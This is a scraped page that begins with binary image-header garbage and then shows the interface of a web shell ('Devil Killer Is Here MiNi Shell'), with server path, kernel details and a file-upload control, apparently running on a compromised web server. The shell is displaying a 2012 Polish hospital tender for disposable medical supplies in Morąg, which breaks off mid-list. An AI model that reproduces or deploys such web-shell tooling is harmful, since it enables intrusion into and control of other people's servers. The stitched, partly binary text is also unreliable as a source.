JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120918/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120918/352666-N-2012.html

<p class="kh_header"><b>Morąg: Sprzęt jednorazowego użytku</b><br>
<b>Numer ogłoszenia: 352666 - 2012; data zamieszczenia: 18.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Opieki Zdrowotnej , ul. Dąbrowskiego 16, 14-300 Morąg, woj. warmińsko-mazurskie, tel. 089 7574231, faks 089 7574593.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozmorag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzęt jednorazowego użytku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dopuszcza się składanie ofert na wybrane zadania od 1 nr do nr 43
PAKIET  1  :Igły jednorazowego  użytku 
PAKIET  2.  Strzykawki jednorazowego użytku
PAKIET  3  :Kaniule dożylne 
PAKIET  4 : Kanula dożylna bez portu górnego
PAKIET  5 : Cewniki 
PAKIET  6 : Przyrządy
PAKIET  7 : Noże wymienne
PAKIET  8 : Zaciskacze , kraniki , korki 
PAKIET  9 : Rurki , maski
PAKIET  10 : Szczoteczki  do pobierania wymazów
PAKIET 11: Wzierniki CuSco
PAKIET 12: Zgłębniki ,cewniki, kanki 
PAKIET 13: Cewniki , Pezzera , Kehra
PAKIET 14:Rurki intubacyjne
PAKIET 15 :Rurki tracheostomijne
PAKIET 16 :Katetery , dreny 
PAKIET 17 :Filtry przeciwbakteryjne
PAKIET 18: Kanki Yankauera 
PAKIET 19 :Dreny , zestawy do drenażu
PAKIET 20  :Przewód do cystoskopu 
PAKIET 21 :Powłoka ochronna do kabla
PAKIET 22: Dreny łączące jałowe 
PAKIET 23 :Zestaw do punkcji opłucnej  
PAKIET 24: Filtr do rurek tracheostomijnych  
PAKIET 25: Zgłębnik  do żywienia dożołądkowego  i zestawy do żywienia dojelitowego
PAKIET  26:Zestaw uniwersalny na stolik 
PAKIET 27: Serweta z wycięciem U
PAKIET 28: Fartuch chirurgiczny do mokrych operacji
PAKIET 29: Maska chirurgiczna
PAKIET 30: Zestaw do cystosomii-cystostom
PAKIET 31:Igły do wstrzyknięć i szczoteczki do endoskopów
PAKIET 32 :Wkłady jednorazowe do systemu ssącego
PAKIET 33 : Papiery : termoczułe , KTG, EKG
PAKIET 34:Papier do defibrylatora LIFEPACK
PAKIET 35: Elektrody , żele 
PAKIET 36: Opaski , pojemniki .
PAKIET 37 Bielizna jednorazowego użytku
PAKIET 38 :Błony rtg , wywoływacz , utrwalacz
Błony i odczynniki muszą pochodzić od jednego producenta i być tej samej marki. 
PAKIET   39 .Koperty
PAKIET  40 : Baseny sanitarne , miski nerkowate
PAKIET  41:  Pisaki  laboratoryjne
PAKIET  42:  Drobny sprzęt laboratoryjny
PAKIET  43:  Koc ratunkowy
Zamawiający nie dopuszcza składania ofert wariantowych. 
Wymagamy od Wykonawców realizowania dostaw zgodnie ze składanymi zamówieniami Niedopuszczalne jest wysyłanie asortymentu, który nie był objęty zamówieniem.
Zamówienia będą składane stosownie do aktualnych potrzeb Szpitala w okresie obowiązywania umowy.
Zaoferowany sprzęt medyczny musi być dopuszczony do obrotu i używania na obszarze RP zgodnie z wymogami Ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. z 2010 r., Nr07, poz. 679), oraz dyrektywami UE.
Szczegółowy opis przedmiotu zamówienia określa załącznik nr 4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.41.20-3, 33.14.13.10-6, 33.14.16.40-8, 33.15.71.10-9, 33.14.14.10-7, 33.19.42.20-4, 33.14.13.00-3, 33.14.12.00-2, 33.14.12.20-8, 33.14.12.40-4, 33.14.14.11-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 43.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">A)Oświadczenie, o posiadaniu aktualnych dokumentów potwierdzających dopuszczenie zaoferowanych wyrobów do  obrotu zgodnie z ustawą z dnia 20 maja 2010 o wyrobach medycznych. (Dz.U. Nr 107, poz.679 ze zmianami oraz dyrektywami UE i dostarczeniu w/w dokumentów na każde żądanie zamawiającego w terminie 3 dni.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę- załącznik nr 1 2) Formularz cenowy - wypełniony i podpisane przez wykonawcę-załącznik nr 2 3) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych. 4)Pełnomocnictwo podmiotów występujących wspólnie ( jeżeli dotyczy).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza zmianę ceny dostarczonego asortymentu wyłącznie w przypadku zmiany stawki  podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena  netto  pozostanie bez zmian;
2.Ceny dostarczonego asortymentu mogą ulec obniżeniu - gdy cenę obniży Wykonawca.
3.Po upływie okresu niezmienności cen jednostkowych  ceny przedstawione w ofercie w  trakcie realizacji umowy mogą ulec zmianie tylko z niżej podanego powodu:
a) podwyższeniu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogłaszany przez Prezesa Głównego Urzędu Statystycznego w Monitorze Polskim</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozmorag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego Budynek administracyjny pokój nr 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2012 godzina 11:45, miejsce: w siedzibie Zamawiającego  Budynek Administracji pokój nr 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Igły jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 1  :   Igły jednorazowego  użytku 
L.p	
Nazwa asortymentu	
J. m.	Potrzeby  roczne
    (średnio)
1.	IGŁY  j. u.  a 100		.    
. 	0,45 x 16
	op	15
. 	0,5 x 25
	op	20
. 	0,6 x 25
	op	20
. 	0,7 x 30
	op	35
. 	0,8 x 40
	op	150
. 	0,9 x 40
	op	100
. 	1,1 x 40
	op	20
. 	1,2 x 40
	op	400
2.
	Igły motylki 0,8	op	5
3.	Igła do pobierania leków z fiolek z gumowym korkiem  z  zakończeniem typu Pencil Point- zapobiegającym fragmentacji korka .Rozm. 1.1-1.2 dł min 30 mm  ,op 100 szt	op	10
4.	Igła do penów  0,3 x 8 mm	szt	1000




PAKIET 1  :   Igły jednorazowego  użytku 
L.p	
Nazwa asortymentu	
J. m.	Potrzeby  roczne
    (średnio)
1.	IGŁY  j. u.  a 100		.    
. 	0,45 x 16
	op	10
. 	0,5 x 25
	op	20
. 	0,6 x 25
	op	20
. 	0,7 x 30
	op	35
. 	0,8 x 40
	op	150
. 	0,9 x 40
	op	100
. 	1,1 x 40
	op	20
. 	1,2 x 40
	op	400
2.
	Igły motylki 0,8	op	5
3.	Igła do pobierania leków z fiolek z gumowym korkiem  z  zakończeniem typu Pencil Point- zapobiegającym fragmentacji korka .Rozm. 1.1-1.2 dł min 30 mm  ,op 100 szt	op	10
4. 	Igła  do penów  0,25 x 6 mm
	szt	500
5.	Igła do penów  0,3 x 8 mm	szt	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.13.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Strzykawki jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET II Strzykawki jednorazowego użytku
	Strzykawki  j. u. a 100szt 	. 	. 
. 	2 ml	op	350
. 	5 ml	op	250
. 	10 ml	op	150
. 	20 ml	op	300
2.	Strzykawka j.u. 50 ml  ( brązowa )	szt	600
3.	Strzykawka  Jampol do pomp infuzyjnych  50 ml,	szt	3 500
4.	Zaneta  plastikowa do    karmienia   100 ml, skalowana  co 2 ml	szt	1 500
5.	Insulinówka  z  igła 0,4x13	szt	20
6.	Tuberkulinówka  z   igłą 
     0,5 x 16	szt	3000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6, 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kaniule dożylne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET III Kaniula dożylna
L.p	
  Nazwa  asortymentu   	
J. m.	   Potrzeby     
    roczne    
    ( średnio )
1	Kaniula  dożylna j.u	. 	. 
	0,7 -2,2	szt	
17 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kaniule dożylne bez portu górnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 4 - Kaniula dożylna bez portu górnego
L.p	
  Nazwa  asortymentu   	
J. m.	   Potrzeby     
    roczne    
    ( średnio )
1	kaniula pediatryczna typu Neoflon, ze zdejmowanym uchwytem rozmiar G24 - G26    szt	1500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 5 Cewniki
L.p.	   Nazwa  asortymentu	J. m.	   Potrzeby    
   roczne     
    (średnio)
1.	Cewnik  FOLEYA   j.u  z  plastikową  zastawką	. 	. 
	                      10	szt	20

	12, 14, 16, 18, 20, 22, 24
	szt	2 000
2.	Cewnik  Nelatona  j.u.	. 	. 
	6 ,  8 , 10 	szt	100

3.	Cewnik do  odsysania  z  dwoma otworami   bocznymi	. 	. 
	  6, 8 , 10, 12, 14, 16, 18	szt	6 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.12.40-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przyrządy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  6 :  Przyrządy
L.p.	    Nazwa  a s o r t y m e n tu 	   J.m.	 Potrzeby    
 roczne           
 ( średnio )
 1.	Przyrząd do przetaczania płynów  infuzyjnych j.u. z komorą kroplową  bez  zawartości PVC	szt	25 000
 2.	Przyrząd do przetaczania   krwi  j.u. z komorą  kroplową  bez zawartości  PVCcałość bez zawartości ftalanów (informacja na 
opakowaniu jednostkowym), zacisk rolkowy wyposażony w uchwyt na dren oraz możliwość zabezpieczenia igły biorczej po użyciu, nazwa producenta na zaciskaczu, opakowanie kolorystyczne folia-papier, sterylny	szt	700
3	Przyrząd do przetaczania płynów  infuzyjnych j.u. z komorą kroplową   wykonana z PP o długości min 65mm, całość wolna od ftalanów (informacja na opakowaniu jednostkowym), igła biorcza ścięta dwupłaszczyznowo wykonana z ABS wzmocnionego włóknem szklanym, zacisk rolkowy wyposażony w uchwyt na dren oraz możliwość zabezpieczenia igły biorczej po użyciu, nazwa producenta na zaciskaczu, opakowanie kolorystyczne folia-papier, sterylny, bursztynowy
	szt	10 000
 4	Przedłużacze do pomp  infuzyjnych 
 150 cm  (bezbarwne )  , 200 cm  (bezbarwne )  	szt	1700
5	Przedłużacze do pomp   infuzyjnych
150 cm  (bursztynowe , 200 cm  (bursztynowe)	szt
	500
6	Przyrząd  do szybkiego  przetaczania krwi
	szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.41.20-3, 33.19.42.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Noże wymienne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 7 :     Noże wymienne
L.p	  Nazwa  asortymentu	 J.m.	Potrzeby roczne
(średnio)
 1	Noże wymienne  a  100  ( skalpel ) 		. 
	10,11,15,22,24	  op	
40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.10-7, 33.14.14.11-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zaciszkacze,kraniki,korki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET 8 : Zaciskacze , kraniki , korki 

L.p	Nazwa  asortymentu	J.m.	Potrzeby
roczne
(średnio)
1.	Kranik trójdrożny, z wyczuwalnym i optycznym indykatorem pozycji zamknięty otwarty, wszystkie wyjścia zabezpieczone koreczkami	  szt	1 000
2.	Korek  sterylny  do wenflonów  z  kaniulą 
	  szt	36 000
3.	Zatyczki  sterylne  do drenów  
	  szt	100
4.	Worki do moczu  dla  dzieci  jałowe,  
	. 	. 
	              Dziewczynki
	  szt	300
	               Chłopcy
	  szt	300
5.	Pojemnik do moczu dla dorosłych  jałowy
	  szt	1500
6.	Aparat  do  wielokrotnego  pobierania
z  filtrem  bakteryjnym  0,22 	 szt	2 200
7	Przyrząd do jałowego przenoszenia płynów 
 (typu Transofix )	szt	400
8.	Łącznik do drenów  z  kontrolą  odsysania 
sterylne	szt	300
9	Łącznik do drenów  bez  kontroli  odsysania z dwiema końcówkami o rozmiarach 10/ 8
sterylne
sterylne	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Rurki,maski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PAKIET  9 :  Rurki , maski

L.P	Nazwa  asortymentu	  J.m.	  Potrzeby    
   roczne   
 (średnio)
1. 	Rurka     ustno - gardłowa     Guedel :	. 	. 
